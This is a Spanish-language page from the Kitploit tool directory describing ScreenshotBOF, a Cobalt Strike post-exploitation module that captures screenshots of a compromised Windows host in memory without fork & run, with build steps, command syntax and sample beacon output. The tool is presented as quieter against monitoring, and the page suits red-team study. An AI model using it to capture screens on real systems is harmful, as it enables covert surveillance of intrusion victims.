Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ScreenshotBOF — Una capacidad alternativa de captura de pantalla para Cobalt Strike que utiliza WinAPI y no realiza un fork & run. Captura de pantalla descargada en memoria. | Kitploit
Herramientas/GitHubGitHub/codextf2/screenshotbof
Post-ExplotaciónPruebas de PenetraciónComando y ControlRed TeamingDesarrollo de Payloads
GitHubcodextf2/screenshotbof

ScreenshotBOF

Una capacidad alternativa de captura de pantalla para Cobalt Strike que utiliza WinAPI y no realiza un fork & run. Captura de pantalla descargada en memoria.

Ver Repositorio
5036794hace 1 mesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

ScreenshotBOF

Una capacidad alternativa de captura de pantalla para Cobalt Strike que usa WinAPI y no realiza un fork & run. Captura de pantalla descargada en memoria.

Características

  • Compresión JPEG
  • Descarga en memoria como captura de pantalla o como archivo
  • Soporta captura de ventanas minimizadas
  • Escala de grises, calidad JPEG y reducción de escala para disminuir el tamaño del archivo

Compilación propia

  1. git clone el repositorio
  2. ejecute make

Métodos de guardado:

  1. soltar archivo en disco
  2. descargar archivo a través de beacon (solo Cobalt Strike)
  3. descargar archivo a través de beacon como captura de pantalla (solo Cobalt Strike)

PID

0: capturar pantalla completa (PID = 0) PID específico: capturar PID específico (¡funciona incluso cuando está minimizado!)

Uso

  1. importe el script screenshotBOF.cna en Cobalt Strike
  2. use el comando screenshot_bof {nombre de archivo local} {método de guardado 0/1/2} {pid/0} {escala de grises 0/1} {calidad 0-100} {escala 0-100}
  • ejecutar screenshot_bof sin argumentos mostrará un diálogo GUI
root@kitploit:~
beacon> screenshot_bof file.jpg 2 21964 0 90 100
[*] Running screenshot BOF by (@codex_tf2)
[+] host called home, sent: 12421 bytes
[+] received output:
Downloading JPEG over beacon as a screenshot with filename file.jpg
[*] received screenshot of Screenshot from Admin (26kb)
[+] received output:
Screenshot saved/downloaded successfully

Notas

  • no se realiza evasión, lo cual debería estar bien ya que las WinAPI utilizadas no son maliciosas

¿Por qué hice esto?

Cobalt Strike utiliza una técnica conocida como fork & run para muchas de sus capacidades post-explotación, incluido el comando screenshot. Si bien este comportamiento proporciona estabilidad, ahora es bien conocido y muy monitoreado. Este BOF está diseñado para proporcionar una versión más segura desde el punto de vista de OPSEC de la capacidad de captura de pantalla.

Créditos

  • Guardar BMP en archivo de https://stackoverflow.com/a/60667564
  • descarga en memoria de https://github.com/anthemtotheego/CredBandit
  • @BinaryFaultline por el renderizado BMP (obsoleto) en aggressorscript y la función de devolución de llamada de captura de pantalla
  • bitmap a jpeg de https://github.com/WKL-Sec/HiddenDesktop

Descargo de responsabilidad

el descargo de responsabilidad habitual aquí, no soy responsable de ningún crimen contra la humanidad que pueda cometer o guerra nuclear que pueda causar usando este fragmento de código mal escrito.

Descargar herramienta